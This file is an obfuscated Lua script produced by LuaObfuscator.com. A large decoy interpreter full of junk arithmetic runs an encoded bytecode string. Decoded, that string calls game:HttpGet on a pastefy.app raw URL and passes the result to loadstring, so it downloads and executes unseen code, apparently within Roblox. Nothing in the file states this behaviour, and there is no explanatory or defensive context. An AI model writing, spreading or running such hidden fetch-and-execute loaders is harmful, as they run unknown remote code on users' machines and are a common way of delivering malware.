--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0 = tonumber;
local v1 = string.byte;
local v2 = string.char;
local v3 = string.sub;
local v4 = string.gsub;
local v5 = string.rep;
local v6 = table.concat;
local v7 = table.insert;
local v8 = math.ldexp;
local v9 = getfenv or function()
	return _ENV;
end;
local v10 = setmetatable;
local v11 = pcall;
local v12 = select;
local v13 = unpack or table.unpack;
local v14 = tonumber;
local function v15(v16, v17, ...)
	local v18 = 1;
	local v19;
	v16 = v4(v3(v16, 5), "..", function(v30)
		if (v1(v30, 2 + 0) == (182 - 101)) then
			local v90 = 1413 - (447 + 966);
			while true do
				if (v90 == (0 - 0)) then
					local v126 = 0;
					while true do
						if (v126 == (1817 - (1703 + 114))) then
							v19 = v0(v3(v30, 702 - (376 + 325), 1 - 0));
							return "";
						end
					end
				end
			end
		else
			local v91 = 0 - 0;
			local v92;
			while true do
				if (v91 == (0 + 0)) then
					v92 = v2(v0(v30, 16));
					if v19 then
						local v133 = 0 - 0;
						local v134;
						local v135;
						while true do
							if (v133 == (14 - (9 + 5))) then
								v134 = 376 - (85 + 291);
								v135 = nil;
								v133 = 1266 - (243 + 1022);
							end
							if (v133 == 1) then
								while true do
									local v145 = 0;
									while true do
										if (v145 == 0) then
											if (v134 == (3 - 2)) then
												return v135;
											end
											if (v134 == (0 + 0)) then
												local v201 = 0;
												while true do
													if (v201 == 1) then
														v134 = 1;
														break;
													end
													if (v201 == (1180 - (1123 + 57))) then
														v135 = v5(v92, v19);
														v19 = nil;
														v201 = 1 + 0;
													end
												end
											end
											break;
										end
									end
								end
								break;
							end
						end
					else
						return v92;
					end
					break;
				end
			end
		end
	end);
	local function v20(v31, v32, v33)
		if v33 then
			local v93 = 254 - (163 + 91);
			local v94;
			local v95;
			while true do
				if (v93 == (1930 - (1869 + 61))) then
					v94 = 0 - ((458 + 1179) - ((5363 - 3840) + (174 - 60)));
					v95 = nil;
					v93 = 1;
				end
				if (v93 == (1 + 0)) then
					while true do
						if (v94 == (((0 - 0) + 0 + 0) - (1474 - (1329 + 145)))) then
							v95 = (v31 / (((974 - (140 + 831)) - (1851 - (1409 + 441))) ^ (v32 - (((720 - (15 + 703)) - (0 + 0)) - 1)))) % (((1059 - (262 + 176)) - (555 + (1785 - (345 + 1376)))) ^ (((v33 - ((1620 - (198 + 490)) - ((3786 - 2929) + 74))) - (v32 - ((1364 - 795) - (367 + 201)))) + (((3199 - (696 + 510)) - (68 + (2090 - 1093))) - ((1476 - (1091 + 171)) + 115 + 598))));
							return v95 - (v95 % (3 - 2));
						end
					end
					break;
				end
			end
		else
			local v96 = 0 - 0;
			local v97;
			local v98;
			while true do
				if (v96 == (375 - (123 + 251))) then
					while true do
						if (v97 == (0 + (0 - 0))) then
							v98 = (700 - (208 + 490)) ^ (v32 - (1 + 0));
							return (((v31 % (v98 + v98)) >= v98) and ((392 + 486) - (282 + (1431 - (660 + 176))))) or (0 + 0);
						end
					end
					break;
				end
				if ((202 - (14 + 188)) == v96) then
					v97 = (675 - (534 + 141)) + 0;
					v98 = nil;
					v96 = 1 + 0;
				end
			end
		end
	end
	local function v21()
		local v34 = 0;
		local v35;
		while true do
			if ((1 + 0) == v34) then
				return v35;
			end
			if (v34 == (0 + 0)) then
				v35 = v1(v16, v18, v18);
				v18 = v18 + (1 - 0);
				v34 = 1 - 0;
			end
		end
	end
	local function v22()
		local v36, v37 = v1(v16, v18, v18 + (8 - (16 - 10)));
		v18 = v18 + ((684 + 588) - (144 + 82 + 1044));
		return (v37 * ((647 - (115 + 281)) + (11 - 6))) + v36;
	end
	local function v23()
		local v38 = 0;
		local v39;
		local v40;
		local v41;
		local v42;
		local v43;
		while true do
			if (v38 == 0) then
				v39 = 0 + 0 + (0 - 0);
				v40 = nil;
				v38 = 3 - 2;
			end
			if (v38 == (868 - (550 + 317))) then
				v41 = nil;
				v42 = nil;
				v38 = 2;
			end
			if (v38 == 2) then
				v43 = nil;
				while true do
					local v124 = 0;
					while true do
						if (v124 == (0 - 0)) then
							if (v39 == (957 - ((1253 - 361) + (181 - 116)))) then
								v40, v41, v42, v43 = v1(v16, v18, v18 + ((292 - (134 + 151)) - ((1668 - (970 + 695)) + (1 - 0))));
								v18 = v18 + (6 - (1992 - (582 + 1408)));
								v39 = (3 - 2) - (0 - 0);
							end
							if (v39 == 1) then
								return (v43 * ((63223863 - 46446297) - ((1911 - (1195 + 629)) + 263))) + (v42 * 65536) + (v41 * (((1415 - 345) - (875 - (187 + 54))) - ((847 - (162 + 618)) + 59 + 25 + 20 + 9))) + v40;
							end
							break;
						end
					end
				end
				break;
			end
		end
	end
	local function v24()
		local v44 = 0;
		local v45;
		local v46;
		local v47;
		local v48;
		local v49;
		local v50;
		while true do
			if (v44 == (3 - 1)) then
				v49 = v20(v46, 463 - (416 + (43 - 17)), 2 + 21 + (1644 - (1373 + 263)));
				v50 = ((v20(v46, (1888 - (814 + (1045 - (451 + 549)))) - (915 + ((64 + 137) - (184 - 65)))) == 1) and -(2 - (1 - 0))) or ((1385 - (746 + 638)) + 0 + 0);
				v44 = 4 - 1;
			end
			if (v44 == 0) then
				v45 = v23();
				v46 = v23();
				v44 = 342 - (218 + 123);
			end
			if (v44 == (1584 - (1535 + 46))) then
				if (v49 == (0 - (0 + 0))) then
					if (v48 == (1187 - (1069 + 18 + 100))) then
						return v50 * ((560 - (306 + 254)) - (0 + 0));
					else
						local v136 = 0 - 0;
						while true do
							if (v136 == (1467 - (899 + 568))) then
								v49 = (1 + 0) - 0;
								v47 = (3595 - 2109) - ((1601 - (268 + 335)) + (778 - (60 + 230)));
								break;
							end
						end
					end
				elseif (v49 == ((1223 - (426 + 146)) + 1396)) then
					return ((v48 == (0 + 0)) and (v50 * (((1 + 0 + 0) - (1456 - (282 + 1174))) / (0 + (811 - (569 + 242)))))) or (v50 * NaN);
				end
				return v8(v50, v49 - 1023) * (v47 + (v48 / ((8 - (17 - 11)) ^ ((49 + 794) - ((1392 - (706 + 318)) + (1401 - (721 + 530)) + (1544 - (945 + 326)))))));
			end
			if (v44 == (2 - 1)) then
				v47 = (3 + 0) - (702 - (271 + 429));
				v48 = (v20(v46, ((10 + 0) - (1507 - (1408 + 92))) - 2, (2058 - (461 + 625)) - ((2090 - (993 + 295)) + 8 + 142)) * (((1176 - (418 + 753)) - (2 + 1)) ^ ((202 - 145) - 25))) + v45;
				v44 = 1 + 1;
			end
		end
	end
	local function v25(v51)
		local v52 = 0 + 0;
		local v53;
		local v54;
		local v55;
		while true do
			if (v52 == 1) then
				v55 = nil;
				while true do
					local v125 = 0;
					while true do
						if (v125 == (0 + 0)) then
							if (v53 == (4 - (530 - (406 + 123)))) then
								return v6(v55);
							end
							if (v53 == (1081 - ((2789 - (1749 + 20)) + 15 + 45))) then
								v54 = v3(v16, v18, (v18 + v51) - (1424 - (630 + (2115 - (1249 + 73)))));
								v18 = v18 + v51;
								v53 = 1 + 1;
							end
							v125 = 1;
						end
						if (v125 == (1146 - (466 + 679))) then
							if (v53 == ((14 - 8) - 4)) then
								local v144 = 0 - 0;
								while true do
									if (v144 == (1901 - (106 + 1794))) then
										v53 = 1 + 1 + 1 + 0;
										break;
									end
									if (v144 == 0) then
										v55 = {};
										for v173 = (11 - 7) - 3, #v54 do
											v55[v173] = v2(v1(v3(v54, v173, v173)));
										end
										v144 = 2 - 1;
									end
								end
							end
							if (v53 == (((114 - (4 + 110)) + (584 - (57 + 527))) - (1427 - (41 + 1386)))) then
								v54 = nil;
								if not v51 then
									v51 = v23();
									if (v51 == ((1850 - (17 + 86)) - (516 + 244 + 987))) then
										return "";
									end
								end
								v53 = (4267 - 2353) - ((5180 - 3391) + (290 - (122 + 44)));
							end
							break;
						end
					end
				end
				break;
			end
			if (v52 == (0 - 0)) then
				v53 = (2935 - 2050) - (213 + 48 + ((202 + 1188) - ((1509 - 764) + 21)));
				v54 = nil;
				v52 = 66 - (30 + 35);
			end
		end
	end
	local v26 = v23;
	local function v27(...)
		return {...}, v12("#", ...);
	end
	local function v28()
		local v56 = (function()
			return function(v99, v100, v101, v102, v103, v104, v105, v106)
				local v99 = (function()
					return 0 + 0;
				end)();
				local v100 = (function()
					return;
				end)();
				local v101 = (function()
					return;
				end)();
				while true do
					if (#"|" == v99) then
						if (v100 == #"]") then
							v101 = (function()
								return v102() ~= ((1257 - (1043 + 214)) - (0 - 0));
							end)();
						elseif (v100 == (1214 - (323 + 889))) then
							v101 = (function()
								return v103();
							end)();
						elseif (v100 == #"xnx") then
							v101 = (function()
								return v104();
							end)();
						end
						v105[v106] = (function()
							return v101;
						end)();
						break;
					end
					if (v99 ~= ((3429 - 2155) - ((968 - (361 + 219)) + (1206 - (53 + 267))))) then
					else
						local v128 = (function()
							return 0 + 0;
						end)();
						local v129 = (function()
							return;
						end)();
						while true do
							if (v128 ~= (413 - (15 + 398))) then
							else
								v129 = (function()
									return 982 - (18 + 964);
								end)();
								while true do
									if (v129 == (1 - (0 - 0))) then
										v99 = (function()
											return #" ";
										end)();
										break;
									end
									if (v129 == (0 + 0)) then
										local v146 = 0 + 0;
										while true do
											if (1 == v146) then
												v129 = (function()
													return 1;
												end)();
												break;
											end
											if (v146 == (850 - (20 + 830))) then
												v100 = (function()
													return v102();
												end)();
												v101 = (function()
													return nil;
												end)();
												v146 = 1;
											end
										end
									end
								end
								break;
							end
						end
					end
				end
				return v99, v100, v101, v102, v103, v104, v105, v106;
			end;
		end)();
		local v57 = (function()
			return function(v107, v108, v109, v110, v111, v112, v113, v114, v115)
				local v116 = (function()
					return 0 + 0;
				end)();
				local v107 = (function()
					return;
				end)();
				local v108 = (function()
					return;
				end)();
				while true do
					local v123 = (function()
						return 0;
					end)();
					while true do
						if (v123 == (126 - (116 + 10))) then
							if (v116 ~= (1 + 0 + (738 - (542 + 196)))) then
							else
								local v141 = (function()
									return (1200 - 640) - (90 + 216 + 130 + 124);
								end)();
								while true do
									if ((0 + 0 + 0) == v141) then
										local v147 = (function()
											return 0;
										end)();
										while true do
											if ((0 - 0) == v147) then
												local v177 = 0 - 0;
												while true do
													if (v177 == 0) then
														while true do
															if (v107 ~= ((1551 - (1126 + 425)) - (405 - (118 + 287)))) then
															else
																v108 = (function()
																	return v109();
																end)();
																if (v110(v108, #"]", #"}") ~= (0 - 0)) then
																else
																	local v211 = (function()
																		return 1121 - (118 + 1003);
																	end)();
																	local v212 = (function()
																		return;
																	end)();
																	local v213 = (function()
																		return;
																	end)();
																	local v214 = (function()
																		return;
																	end)();
																	local v215 = (function()
																		return;
																	end)();
																	while true do
																		if (v211 == (0 - 0)) then
																			local v216 = 377 - (142 + 235);
																			local v217;
																			local v218;
																			while true do
																				if (1 == v216) then
																					while true do
																						if (v217 == (0 + (0 - 0))) then
																							v218 = (function()
																								return (0 + 0) - (977 - (553 + 424));
																							end)();
																							while true do
																								if (v218 ~= ((1142 - 538) - (237 + 31 + 333 + 2))) then
																								else
																									v211 = (function()
																										return (170 + 121) - (26 + 34 + 132 + 98);
																									end)();
																									break;
																								end
																								if (v218 == (0 - 0)) then
																									v212 = (function()
																										return 0;
																									end)();
																									v213 = (function()
																										return nil;
																									end)();
																									v218 = (function()
																										return 573 - ((1186 - 760) + (326 - 180));
																									end)();
																								end
																							end
																							break;
																						end
																					end
																					break;
																				end
																				if (v216 == 0) then
																					v217 = (function()
																						return (427 + 1040) - (899 + 568);
																					end)();
																					v218 = (function()
																						return;
																					end)();
																					v216 = 4 - 3;
																				end
																			end
																		end
																		if (v211 ~= (754 - (239 + 514))) then
																		else
																			local v219 = (function()
																				return 0;
																			end)();
																			while true do
																				if (v219 ~= (1 + 0)) then
																				else
																					v211 = (function()
																						return 1331 - (797 + 532);
																					end)();
																					break;
																				end
																				if (v219 ~= (0 + 0 + 0 + 0)) then
																				else
																					v214 = (function()
																						return nil;
																					end)();
																					v215 = (function()
																						return nil;
																					end)();
																					v219 = (function()
																						return (3425 - 1968) - (282 + (2376 - (373 + 829)));
																					end)();
																				end
																			end
																		end
																		if (v211 == 2) then
																			while true do
																				if (#"/" ~= v212) then
																				else
																					local v221 = (function()
																						return 811 - ((1300 - (476 + 255)) + (1372 - (369 + 761)));
																					end)();
																					while true do
																						if (v221 ~= (0 + 0)) then
																						else
																							v215 = (function()
																								return {v111(),v111(),nil,nil};
																							end)();
																							if (v213 == ((0 - 0) + (336 - (144 + 192)))) then
																								local v229 = 0;
																								local v230;
																								local v231;
																								while true do
																									if (v229 == (217 - (42 + 174))) then
																										while true do
																											if (v230 == ((940 + 311) - (721 + 440 + 90))) then
																												v231 = (function()
																													return (540 + 731) - (945 + (1830 - (363 + 1141)));
																												end)();
																												while true do
																													if (v231 ~= ((1580 - (1183 + 397)) - (0 - 0))) then
																													else
																														v215[#"xxx"] = (function()
																															return v111();
																														end)();
																														v215[#".com"] = (function()
																															return v111();
																														end)();
																														break;
																													end
																												end
																												break;
																											end
																										end
																										break;
																									end
																									if (v229 == (0 + 0)) then
																										v230 = (function()
																											return (766 + 258) - ((2681 - (1913 + 62)) + 201 + 117);
																										end)();
																										v231 = (function()
																											return;
																										end)();
																										v229 = 2 - 1;
																									end
																								end
																							elseif (v213 == #":") then
																								v215[#"xnx"] = (function()
																									return v112();
																								end)();
																							elseif (v213 == ((1935 - (565 + 1368)) + 0)) then
																								v215[#"nil"] = (function()
																									return v112() - ((7 - 5) ^ ((2377 - (1477 + 184)) - (271 + (583 - 154))));
																								end)();
																							elseif (v213 ~= #"19(") then
																							else
																								local v235 = (function()
																									return 0 + 0;
																								end)();
																								local v236 = (function()
																									return;
																								end)();
																								while true do
																									if (((1398 + 102) - (1408 + (948 - (564 + 292)))) == v235) then
																										v236 = (function()
																											return (1873 - 787) - ((1389 - 928) + 625);
																										end)();
																										while true do
																											if ((1288 - ((1297 - (244 + 60)) + 295)) == v236) then
																												v215[#"91("] = (function()
																													return v112() - (2 ^ (1 + 0 + (491 - (41 + 435))));
																												end)();
																												v215[#"0836"] = (function()
																													return v111();
																												end)();
																												break;
																											end
																										end
																										break;
																									end
																								end
																							end
																							v221 = (function()
																								return 1002 - (938 + 63);
																							end)();
																						end
																						if (v221 == ((902 + 270) - ((1543 - (936 + 189)) + 248 + 505))) then
																							v212 = (function()
																								return 2;
																							end)();
																							break;
																						end
																					end
																				end
																				if (v212 ~= 0) then
																				else
																					local v222 = (function()
																						return 1613 - (1565 + 48);
																					end)();
																					while true do
																						if (v222 == (1 + 0 + (1138 - (782 + 356)))) then
																							v212 = (function()
																								return #":";
																							end)();
																							break;
																						end
																						if (v222 ~= (267 - (176 + 91))) then
																						else
																							v213 = (function()
																								return v110(v108, 1 + (2 - 1), #"19(");
																							end)();
																							v214 = (function()
																								return v110(v108, #"?id=", (2 - 0) + (1096 - (975 + 117)));
																							end)();
																							v222 = (function()
																								return 1 + (1875 - (157 + 1718));
																							end)();
																						end
																					end
																				end
																				if (#"-19" ~= v212) then
																				else
																					if (v110(v214, #"xnx", #"asd") == #" ") then
																						v215[#"http"] = (function()
																							return v113[v215[#"asd1"]];
																						end)();
																					end
																					v114[v115] = (function()
																						return v215;
																					end)();
																					break;
																				end
																				if (v212 == 2) then
																					local v224 = 0 + 0;
																					local v225;
																					local v226;
																					while true do
																						if (v224 == 1) then
																							while true do
																								if (v225 ~= (0 - 0)) then
																								else
																									v226 = (function()
																										return 0;
																									end)();
																									while true do
																										if (v226 == (1770 - ((5979 - 4230) + (1038 - (697 + 321))))) then
																											v212 = (function()
																												return #"-19";
																											end)();
																											break;
																										end
																										if ((0 - 0) == v226) then
																											local v234 = 0 - 0;
																											while true do
																												if (v234 == (0 - 0)) then
																													if (v110(v214, #"~", #"]") ~= #"~") then
																													else
																														v215[1 + 1] = (function()
																															return v113[v215[3 - 1]];
																														end)();
																													end
																													if (v110(v214, 1 + (2 - 1), (2551 - (322 + 905)) - ((1860 - (602 + 9)) + 73)) == #"~") then
																														v215[#"19("] = (function()
																															return v113[v215[#"nil"]];
																														end)();
																													end
																													v234 = 1;
																												end
																												if (v234 == 1) then
																													v226 = (function()
																														return 1;
																													end)();
																													break;
																												end
																											end
																										end
																									end
																									break;
																								end
																							end
																							break;
																						end
																						if (v224 == (1189 - (449 + 740))) then
																							v225 = (function()
																								return 529 - ((1278 - (826 + 46)) + (1070 - (245 + 702)));
																							end)();
																							v226 = (function()
																								return;
																							end)();
																							v224 = 1;
																						end
																					end
																				end
																			end
																			break;
																		end
																	end
																end
																break;
															end
														end
														return v107, v108, v109, v110, v111, v112, v113, v114, v115;
													end
												end
											end
										end
									end
								end
							end
							if (v116 == ((0 - 0) + 0)) then
								local v142 = (function()
									return 0 + 0;
								end)();
								local v143 = (function()
									return;
								end)();
								while true do
									if (v142 ~= 0) then
									else
										v143 = (function()
											return 1898 - (260 + 1638);
										end)();
										while true do
											if (v143 == 1) then
												v116 = (function()
													return 441 - (382 + 58);
												end)();
												break;
											end
											if (v143 == (0 - 0)) then
												v107 = (function()
													return (952 + 193) - ((962 - 496) + (2018 - 1339));
												end)();
												v108 = (function()
													return nil;
												end)();
												v143 = (function()
													return (1207 - (902 + 303)) - (1 - 0);
												end)();
											end
										end
										break;
									end
								end
							end
							break;
						end
					end
				end
			end;
		end)();
		local v58 = (function()
			return function(v117, v118, v119)
				local v120 = 0 - 0;
				local v121;
				local v122;
				while true do
					if (v120 == 0) then
						v121 = (function()
							return 0 - (0 + 0);
						end)();
						v122 = (function()
							return;
						end)();
						v120 = 1;
					end
					if (v120 == 1) then
						while true do
							if (v121 == (1690 - (1121 + 569))) then
								v122 = (function()
									return 214 - (22 + 192);
								end)();
								while true do
									if (((2583 - (483 + 200)) - ((1569 - (1404 + 59)) + (4909 - 3115))) == v122) then
										local v148 = 0;
										local v149;
										local v150;
										while true do
											if (v148 == (1 - 0)) then
												while true do
													if (v149 == ((765 - (468 + 297)) + 0)) then
														v150 = (function()
															return 562 - (334 + 228);
														end)();
														while true do
															if (v150 ~= (0 - 0)) then
															else
																local v207 = 0;
																local v208;
																while true do
																	if (v207 == (0 - 0)) then
																		v208 = (function()
																			return 0;
																		end)();
																		while true do
																			if (v208 ~= (0 - (0 - 0))) then
																			else
																				local v220 = 0;
																				while true do
																					if (v220 == (0 + 0)) then
																						v117[v118 - #"|"] = (function()
																							return v119();
																						end)();
																						return v117, v118, v119;
																					end
																				end
																			end
																		end
																		break;
																	end
																end
															end
														end
														break;
													end
												end
												break;
											end
											if (v148 == (236 - (141 + 95))) then
												v149 = (function()
													return 0 + 0 + 0;
												end)();
												v150 = (function()
													return;
												end)();
												v148 = 1;
											end
										end
									end
								end
								break;
							end
						end
						break;
					end
				end
			end;
		end)();
		local v59 = (function()
			return {};
		end)();
		local v60 = (function()
			return {};
		end)();
		local v61 = (function()
			return {};
		end)();
		local v62 = (function()
			return {v59,v60,nil,v61};
		end)();
		local v63 = (function()
			return v23();
		end)();
		local v64 = (function()
			return {};
		end)();
		for v72 = #"[", v63 do
			FlatIdent_1076E, Type, Cons, v21, v24, v25, v64, v72 = (function()
				return v56(FlatIdent_1076E, Type, Cons, v21, v24, v25, v64, v72);
			end)();
		end
		v62[#"91("] = (function()
			return v21();
		end)();
		for v73 = #"{", v23() do
			FlatIdent_A36C, Descriptor, v21, v20, v22, v23, v64, v59, v73 = (function()
				return v57(FlatIdent_A36C, Descriptor, v21, v20, v22, v23, v64, v59, v73);
			end)();
		end
		for v74 = #"/", v23() do
			v60, v74, v28 = (function()
				return v58(v60, v74, v28);
			end)();
		end
		return v62;
	end
	local function v29(v66, v67, v68)
		local v69 = v66[(5 - (1 + 2)) - (2 - 1)];
		local v70 = v66[2 + 0];
		local v71 = v66[(61 + 56) - (4 + ((346 - 100) - (81 + 55)))];
		return function(...)
			local v75 = 163 - (92 + 71);
			local v76;
			local v77;
			local v78;
			local v79;
			local v80;
			local v81;
			local v82;
			local v83;
			local v84;
			local v85;
			local v86;
			local v87;
			local v88;
			local v89;
			while true do
				if (v75 == (0 + 0)) then
					v76 = v69;
					v77 = v70;
					v78 = v71;
					v75 = 1 - 0;
				end
				if (v75 == (768 - (574 + 191))) then
					v85 = {};
					v86 = {};
					for v130 = 0 + 0, v84 do
						if ((v130 >= v78) or (3755 <= (2292 - 1377))) then
							v82[v130 - v78] = v83[v130 + 1];
						else
							v86[v130] = v83[v130 + ((1 + 0) - 0)];
						end
					end
					v75 = 4;
				end
				if (v75 == 4) then
					v87 = (v84 - v78) + (((1604 - (254 + 595)) - ((365 - (55 + 71)) + (676 - 162))) - (1791 - (573 + 1217)));
					v88 = nil;
					v89 = nil;
					v75 = 5;
				end
				if (v75 == (5 - 3)) then
					v82 = {};
					v83 = {...};
					v84 = v12("#", ...) - (((5 - 1) - (942 - (714 + 225))) + (0 - 0));
					v75 = 3;
				end
				if (v75 == (1 - 0)) then
					v79 = v27;
					v80 = (64 + 521) - ((82 - 25) + (1333 - (118 + 688)));
					v81 = -(1428 - ((89 - (25 + 23)) + 1386));
					v75 = 1 + 1;
				end
				if (v75 == 5) then
					while true do
						v88 = v76[v80];
						v89 = v88[167 - (122 + (1930 - (927 + 959)))];
						if (v89 <= ((16 - 11) - 2)) then
							if (v89 <= ((735 - (16 + 716)) - (3 - 1))) then
								if ((3946 > 3743) and (v89 == (0 + (97 - (11 + 86))))) then
									v86[v88[(2 - 1) + (286 - (175 + 110))]] = v68[v88[(4 - 2) + (4 - 3)]];
								else
									v86[v88[(1799 - (503 + 1293)) - (1330 - (797 + 532))]] = v88[68 - (30 + (97 - 62))];
								end
							elseif (v89 == 2) then
								local v155 = 0 + 0;
								local v156;
								local v157;
								local v158;
								local v159;
								local v160;
								while true do
									if ((1061 - (810 + 251)) == v155) then
										v156 = 0 + 0 + 0 + 0;
										v157 = nil;
										v155 = 1;
									end
									if (v155 == 2) then
										v160 = nil;
										while true do
											if ((v156 == (2 + 0)) or (1335 >= (3839 - (43 + 490)))) then
												for v205 = v157, v81 do
													local v206 = 733 - (711 + 22);
													while true do
														if (0 == v206) then
															v160 = v160 + 1;
															v86[v205] = v158[v160];
															break;
														end
													end
												end
												break;
											end
											if (((18737 - 13893) > (3112 - (240 + 619))) and (v156 == ((304 + 953) - ((1658 - 615) + 11 + 145 + 58)))) then
												v157 = v88[2];
												v158, v159 = v79(v86[v157](v13(v86, v157 + ((1747 - (1344 + 400)) - (407 - (255 + 150))), v88[(958 + 257) - (173 + 150 + (1281 - 981) + 589)])));
												v156 = 2 - (3 - 2);
											end
											if (((2191 - (404 + 1335)) == (858 - (183 + 223))) and (v156 == ((706 - 125) - (361 + 146 + 73)))) then
												v81 = (v159 + v157) - (321 - (53 + 267));
												v160 = 0;
												v156 = 1 + 0 + ((339 - (10 + 327)) - 1);
											end
										end
										break;
									end
									if ((1 + 0) == v155) then
										v158 = nil;
										v159 = nil;
										v155 = 340 - (118 + 220);
									end
								end
							else
								local v161 = v88[(1617 - (125 + 248 + (1278 - (108 + 341)))) - (7 + 8 + 398)];
								local v162 = v86[v88[985 - (18 + (4075 - 3111))]];
								v86[v161 + (3 - (1495 - (711 + 782)))] = v162;
								v86[v161] = v162[v88[((1406 - 672) - ((945 - (270 + 199)) + 255)) + 1 + 0]];
							end
						elseif (v89 <= ((1823 - (580 + 1239)) + ((3362 - 2231) - (353 + 16 + 28 + 733)))) then
							if (v89 == ((373 + 481) - ((52 - 32) + 516 + 314))) then
								local v166 = 1167 - (645 + 522);
								local v167;
								local v168;
								local v169;
								local v170;
								local v171;
								while true do
									if (v166 == (1792 - (1010 + 780))) then
										v88 = v76[v80];
										v171 = v88[2 + 0 + (0 - 0)];
										v170 = v86[v88[(5 - 3) + (1837 - (1045 + 791))]];
										v86[v171 + ((4 - 2) - (1 - 0))] = v170;
										v86[v171] = v170[v88[(514 - (351 + 154)) - (1579 - (1281 + 293))]];
										v80 = v80 + ((1818 - (28 + 238)) - ((2515 - 1389) + (1984 - (1381 + 178))));
										v166 = 3;
									end
									if (v166 == 4) then
										v81 = (v169 + v171) - (1 + 0 + 0 + 0);
										v167 = 0 - (0 + 0);
										for v198 = v171, v81 do
											v167 = v167 + (3 - 2);
											v86[v198] = v168[v167];
										end
										v80 = v80 + 1 + 0 + ((470 - (381 + 89)) - 0);
										v88 = v76[v80];
										v171 = v88[(869 + 110) - (374 + 179 + (725 - 301))];
										v166 = 1161 - (1074 + 82);
									end
									if (v166 == (12 - 6)) then
										do
											return;
										end
										break;
									end
									if (v166 == (1784 - (214 + 1570))) then
										v167 = nil;
										v168, v169 = nil;
										v170 = nil;
										v171 = nil;
										v86[v88[(1457 - (990 + 465)) + 0]] = {};
										v80 = v80 + ((31 + 43 + 53) - (51 + 65 + 10));
										v166 = 1 + 0;
									end
									if (v166 == (3 - 2)) then
										v88 = v76[v80];
										v86[v88[1728 - (1668 + 58)]] = v68[v88[3]];
										v80 = v80 + (627 - (512 + 114)) + (0 - 0);
										v88 = v76[v80];
										v86[v88[(1529 - 789) - ((1885 - 1343) + 92 + 104)]] = v68[v88[(2 + 4) - (3 + 0)]];
										v80 = v80 + ((3 - 2) - (1994 - (109 + 1885))) + 0;
										v166 = 1471 - (1269 + 200);
									end
									if ((9 - 4) == v166) then
										v86[v171] = v86[v171](v13(v86, v171 + ((816 - (98 + 717)) - 0), v81));
										v80 = v80 + (827 - (802 + 24));
										v88 = v76[v80];
										v86[v88[338 - (144 + (330 - 138))]]();
										v80 = v80 + 1;
										v88 = v76[v80];
										v166 = 7 - 1;
									end
									if (v166 == 3) then
										v88 = v76[v80];
										v86[v88[407 - (118 + 287)]] = v88[((3 + 17) - (7 + 2)) - (2 + 6)];
										v80 = v80 + ((243 + 879) - ((328 - 210) + 1003));
										v88 = v76[v80];
										v171 = v88[6 - 4];
										v168, v169 = v79(v86[v171](v13(v86, v171 + (((86 + 154) - (27 + 37 + 144 + 30)) - 1), v88[(277 + 103) - (67 + 75 + 235)])));
										v166 = 1437 - (797 + 636);
									end
								end
							else
								do
									return;
								end
							end
						elseif (v89 <= (((1077 - 855) - ((1661 - (1427 + 192)) + 61 + 113)) + (0 - 0))) then
							v86[v88[2 + 0 + 0]] = {};
						elseif (v89 == (3 + 2 + 2)) then
							v86[v88[(327 - (192 + 134)) + (1276 - (316 + 960)) + 1 + 0 + 0 + 0]]();
						else
							local v175 = 0;
							local v176;
							while true do
								if ((0 + 0) == v175) then
									v176 = v88[(7 - 5) + (551 - (83 + 468))];
									v86[v176] = v86[v176](v13(v86, v176 + ((1808 - (1202 + 604)) - (4 - 3)), v81));
									break;
								end
							end
						end
						v80 = v80 + 1;
					end
					break;
				end
			end
		end;
	end
	return v29(v28(), {}, v17)(...);
end
return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403203Q00682Q7470733A2Q2F706173746566792E612Q702F6F555063594675322F72617700094Q00047Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00", v9(), ...);
